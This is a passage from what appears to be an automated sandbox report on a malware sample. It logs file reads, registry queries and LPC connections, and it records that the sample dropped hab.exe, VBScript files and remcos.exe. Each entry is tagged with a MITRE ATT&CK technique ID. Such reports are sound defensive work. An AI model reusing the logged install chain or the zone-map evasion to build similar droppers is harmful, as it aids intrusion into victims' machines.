"\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" reads file \"c:\\windows\\win.ini\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" reads file \"c:\\04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" reads file \"c:\\users\\%osuser%\\searches\\desktop.ini\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" reads file \"c:\\users\\%osuser%\\videos\\desktop.ini\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" reads file \"c:\\users\\%osuser%\\pictures\\desktop.ini\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" reads file \"c:\\users\\%osuser%\\contacts\\desktop.ini\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" reads file \"c:\\users\\%osuser%\\favorites\\desktop.ini\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" reads file \"c:\\users\\%osuser%\\music\\desktop.ini\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" reads file \"c:\\users\\%osuser%\\downloads\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to touch file \"C:\\MSVBVM60.DLL\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to touch file \"C:\\Windows\\system32\\MSVBVM60.DLL\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to touch file \"C:\\CRYPTBASE.dll\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTBASE.dll\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to touch file \"C:\\04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe.cfg\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to access non-existent file \"C:\\04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe.cfg\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\uxtheme.dll.Config\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to access non-existent file \"C:\\04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe.Local\\\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to access non-existent file \"C:\\04477B12CF1BB7C6AA72F3E830AF1CD22D8970DBF17B1EC5062A0A1FD3DCD4FC.EXE.CFG\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to access non-existent file \"C:\\Windows\\System32\\UXTHEME.DLL.CONFIG\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to access non-existent file \"C:\\04477B12CF1BB7C6AA72F3E830AF1CD22D8970DBF17B1EC5062A0A1FD3DCD4FC.EXE.LOCAL\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe:Zone.Identifier\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe:ZONE.IDENTIFIER\"\n \"hab.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe.cfg\"\n \"hab.exe\" trying to access non-existent file \"C:\\Windows\\system32\\uxtheme.dll.Config\"\n \"hab.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe.Local\\\"\n \"hab.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\HAB.EXE.CFG\"\n \"hab.exe\" trying to access non-existent file \"C:\\Windows\\System32\\UXTHEME.DLL.CONFIG\"\n \"hab.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\HAB.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\"; Key: \"\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\DLLNXOPTIONS\"; Key: \"\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" connecting to \"\\ThemeApiPort\"\n \"hab.exe\" connecting to \"\\ThemeApiPort\"\n \"remcos.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" touched file \"C:\\Windows\\win.ini\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"hab.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"hab.exe\" touched file \"C:\\Windows\\win.ini\"\n \"hab.exe\" touched file \"C:\\Windows\\System32\\en\\WScript.exe.mui\"\n \"hab.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"hab.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"WScript.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"WScript.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"cmd.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"remcos.exe\" touched file \"C:\\Windows\\win.ini\"\n \"remcos.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"remcos.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"remcos.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\DLLNXOPTIONS\"; Key: \"USEFILTER\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\\DLLNXOPTIONS\"; Key: \"MSVBVM60.DLL\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"04477B12CF1BB7C6AA72F3E830AF1CD22D8970DBF17B1EC5062A0A1FD3DCD4FC\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" writes file \"c:\\windows\\win.ini\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\hab.exe\"\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\hab.vbs\"\n \"hab.exe\" writes file \"c:\\windows\\win.ini\"\n \"hab.exe\" writes file \"c:\\users\\%osuser%\\appdata\\roaming\\remcos\\remcos.exe\"\n \"hab.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\install.vbs\"\n \"remcos.exe\" writes file \"c:\\windows\\win.ini\"\n \"remcos.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\hab.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"hab.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\hab.exe]- [targetUID: 00000000-00003080]\n \"remcos.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%APPDATA%\\remcos\\remcos.exe]- [targetUID: 00000000-00002528]\n \"install.vbs\" has type \"data\"- Location: [%TEMP%\\install.vbs]- [targetUID: 00000000-00003080]\n \"hab.vbs\" has type \"ASCII text with CRLF line terminators\"- Location: [%TEMP%\\hab.vbs]- [targetUID: 00000000-00004516]\n \"win.ini\" has type \"data\"- Location: [%WINDIR%\\win.ini]- [targetUID: 00000000-00006044]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579560'}\" (UID: 00000000-00005844)\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579576'}\" (UID: 00000000-00005844)\n \"hab.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579560'}\" (UID: 00000000-00006044)\n \"hab.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579576'}\" (UID: 00000000-00006044)\n \"hab.exe\" called \"LoadResource with parameter {'hModule': '0', 'hResInfo': '4309192'}\" (UID: 00000000-00006072)\n \"hab.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579560'}\" (UID: 00000000-00004444)\n \"hab.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579576'}\" (UID: 00000000-00004444)\n \"hab.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579560'}\" (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579576'}\" (UID: 00000000-00003528)\n \"hab.exe\" called \"LoadResource with parameter {'hModule': '0', 'hResInfo': '4309192'}\" (UID: 00000000-00003528)\n \"remcos.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579560'}\" (UID: 00000000-00000888)\n \"remcos.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579576'}\" (UID: 00000000-00000888)\n \"remcos.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579560'}\" (UID: 00000000-00004516)\n \"remcos.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4579576'}\" (UID: 00000000-00004516)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")\n \"hab.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")\n \"WScript.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")\n \"remcos.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"hab.exe\" called \"FindResourceA\" with parameter \"4282192\" - (UID: 00000000-00006072)\n \"hab.exe\" called \"FindResourceA\" with parameter \"4282192\" - (UID: 00000000-00003528)\n \"hab.exe\" called \"FindResourceA\" with parameter \"4282192\" - (UID: 00000000-00003748)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\\" at 00000000-00005844-0000010C-1040267\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information of \"C:\\\" at 00000000-00005844-0000010C-1052622\n \"04477b12cf1bb7c6aa72f3e830af1cd22d8970dbf17b1ec5062a0a1fd3dcd4fc.exe\" queries volume information 